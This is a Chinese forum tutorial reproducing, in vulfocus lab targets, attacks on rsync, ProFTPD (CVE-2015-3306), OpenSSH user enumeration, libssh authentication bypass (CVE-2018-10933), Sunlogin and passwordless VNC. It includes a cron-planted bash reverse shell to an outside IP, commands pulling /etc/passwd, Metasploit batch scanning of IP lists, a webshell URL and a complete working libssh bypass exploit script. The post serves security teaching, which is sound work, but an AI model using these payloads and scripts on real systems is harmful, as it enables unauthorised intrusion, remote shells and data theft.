IT评测·应用市场-qidao123.com
标题:
远程访问安全:rsync、ProFTPD、OpenSSH和VNC毛病分析
[打印本页]
作者:
罪恶克星
时间:
2024-8-26 14:39
标题:
远程访问安全:rsync、ProFTPD、OpenSSH和VNC毛病分析
在当今高度互联的数字时代,远程访问工具已成为企业和个人日常工作中不可或缺的一部分。然而,这些工具在带来便利的同时,也大概成为网络安全的潜伏威胁。本文将深入探讨几种常见远程访问服务和工具的安全毛病,包括rsync、ProFTPD、OpenSSH、向日葵远程控制和VNC。通过实际案例和毛病复现,我们将显现这些工具大概面临的安全风险,并提供相应的防护发起。
rsync
未授权访问
概念
rsync是Linux下一款数据备份工具,支持通过rsync协议、ssh协议进行远程文件传输。此中rsync协议默认
监听873端口
,如果目的开启了rsync服务,而且没有配置ACL或访问密码,我们将可以读写目的服务器文件。
复现
靶场
vulfocus/rsync-common:latest
判断是否存在毛病rsync rsync://123.58.224.8:24947
读取文件夹: rsync rsync://123.58.224.8:24947/src
下载文件:rsync rsync://123.58.224.8:24947/src/etc/passwd ./
上传文件:rsync -av passwd rsync://123.58.224.8:24947/src/tmp/passwd
反弹shell:
获取目的服务器的任务信息rsync rsync://123.58.224.8:24947/src/etc/crontab /root/cron.txt
创建文件chmod +x shell
shell文件内容:
#!/bin/bash
/bin/bash -i >& /dev/tcp/43.139.186.80/5566 0>&1
复制代码
给予实行权限chmod +x shell
上传文件rsync -av shell rsync://123.58.224.8:24947/src/etc/cron.hourly
nc监听,等候定时任务触发nc -lvvp 5566
个别工具检测
工具:
kali自带的msf
过程
msfconsole
use auxiliary/scanner/rsync/modules_list
set rhost 39.103.170.93
set rport 873
run
批量工具检测
工具:
kali自带的msf
本身准备好大量ip
过程
msfconsole
use auxiliary/scanner/rsync/modules_list
set rhosts file:/home/kali/Desktop/1.txt
set threads 10
run
实验连接
proftpd
远程命令
介绍
ProFTPD是ProFTPD团队的一套开源的FTP服务器软件。该软件具有可配置性强、安全、稳固等特点。
ProFTPD 1.3.5中的mod_copy模块允许远程攻击者通过站点cpfr和site cpto命令读取和写入恣意文件。任何未经身份验证的客户端都可以利用这些命令将文件从文件系统的任何部分复制到选定的目的。 复制命令利用ProFTPD服务的权限实行,默认环境下,该服务在“nobody”用户的权限下运行。 通过利用/ proc / self / cmdline将PHP有效负载复制到网站目录,可以实现PHP远程代码实行。
CVE-2015-3306复现
靶场:vulfocus proftpd 远程代码实行 (CVE-2015-3306)
端口对应:21:43182 80:21905
工具:exploit-CVE-2015-3306-master.zip
直接实行脚本即可python exploit.py --host 123.58.224.8 --port 21905 --path "/var/www/html/"
访问http://123.58.224.8:21905/backdoor.php?cmd=ls成功实行命令
openssh
信息泄漏
介绍
OpenSSH(OpenBSD Secure Shell)是OpenBSD计划组所维护的一套用于安全访问远程计算机的连接工具。
OpenSSH 7.7及之前版本中存在用户枚举毛病,该毛病源于程序会对有效的和无效的用户身份验证请求发出差别的相应。攻击者可通过发送特制的请求利用该毛病
枚举用户名称
。
复现
靶场
vulfocus/ssh-passwd:latest
工具:CVE-2018-15473-Exploit
直接利用工具枚举即可,python sshUsernameEnumExploit.py --port 39378 --userList top_shortlist.txt 123.58.224.8
libssh身份绕过
介绍
libssh是一个用于访问SSH服务的C语言开发包,它可以或许实行远程命令、文件传输,同时为远程的程序提供安全的传输通道。server-side state machine是此中的一个服务器端状态机。
在libssh的服务器端状态机中发现了一个逻辑毛病。攻击者可以MSG_USERAUTH_SUCCESS在身份验证成功之前发送消息。这样可以绕过身份验证并访问目的SSH服务器。
条件
libssh 0.6版本以下
危害
libssh 0.6版本以下恣意命令实行
复现
靶场
vuifoucus libssh 身份验证绕过(CVE-2018-10933)
直接利用脚本即可python38 libssh.py 123.58.224.8 61334 "ls"
#!/usr/bin/env python3
import sys
import paramiko
import socket
import logging
logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
bufsize = 2048
def execute(hostname, port, command):
sock = socket.socket()
try:
sock.connect((hostname, int(port)))
message = paramiko.message.Message()
transport = paramiko.transport.Transport(sock)
transport.start_client()
message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
transport._send_message(message)
client = transport.open_session(timeout=10)
client.exec_command(command)
# stdin = client.makefile("wb", bufsize)
stdout = client.makefile("rb", bufsize)
stderr = client.makefile_stderr("rb", bufsize)
output = stdout.read()
error = stderr.read()
stdout.close()
stderr.close()
#return output.decode()
return (output+error).decode()
except paramiko.SSHException as e:
logging.exception(e)
logging.debug("TCPForwarding disabled on remote server can't connect. Not Vulnerable")
except socket.error:
logging.debug("Unable to connect.")
return None
if __name__ == '__main__':
print(execute(sys.argv[1], sys.argv[2], sys.argv[3]))
//请使用最新版的python运行
复制代码
向日葵
远程RCE
介绍
向日葵远程控制是一款面向企业和专业人员的远程pc管理和控制的服务软件。可以在任何有网络的环境下,轻松访问并控制安装了向日葵客户端的远程主机。同时还能实现远程文件传输、远程视频监控等功能,这不仅为用户的利用带来许多便捷,还能为其提供各类保障。
Sunlogin RCE 是毛病发生在接口/check处,当参数cmd的值以ping大概nslookup开头时可以构造命令实现远程命令实行利用,客户端开启客户端会自动随机开启一个大于40000的端标语。
条件
影响客户端版本:
11.1.1
10.3.0.27372
11.0.0.33162
靶场:
着实这都不用复现因为如果真的可以成功,这不就是成钓鱼软件嘛,废物毛病直接强制更新
复现就直接运行xrkRce.exe -h ip地址
VNC
配置不当
介绍
VNC(Virtual Network Computing)是一种远程桌面共享系统,它允许用户通过网络连接远程控制另一台计算机。VNC利用RFB(远程帧缓冲)协议,可以在差别的操作系统之间工作,如Windows、Mac、Linux等。它的工作原理是将远程计算机的屏幕内容传输到当地设备,同时将当地的鼠标和键盘输入发送到远程计算机。VNC通常用于远程技术支持、远程办公、教育培训等场景,具有跨平台、易用性高的特点,但也需要留意网络安全题目。在利用时,通常需要在远程计算机上运行VNC服务器,而在当地设备上运行VNC检察器来创建连接。
但是利用空密码就会导致其他人直接连接上来
默认端标语:5900
复现
靶场
受害者安装sever,攻击者安装viewer即可
下载链接:https://pan.baidu.com/s/1SwwfrDIbxdcq_0xKCuPoJQ?pwd=cong
用nmap扫描扫主机开放5900端口
实验用vnc进行连接
发现可以连接成功
通过对这些常见远程访问工具毛病的分析和复现,我们可以清楚地看到,纵然是广泛利用的软件也大概存在严重的安全隐患。作为网络管理员或IT安全专业人士,我们必须时间保持警惕,定期更新和修补系统,严格管理访问权限,并采取多层次的安全措施来保护我们的网络资产。同时,对于普通用户而言,了解这些潜伏风险也很紧张,可以资助我们在利用远程访问工具时更加审慎,采取须要的安全预防措施。只有通过持续的学习、vigilance和最佳实践的实施,我们才能在享受远程访问便利的同时,有效地低落安全风险。
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
欢迎光临 IT评测·应用市场-qidao123.com (https://dis.qidao123.com/)
Powered by Discuz! X3.4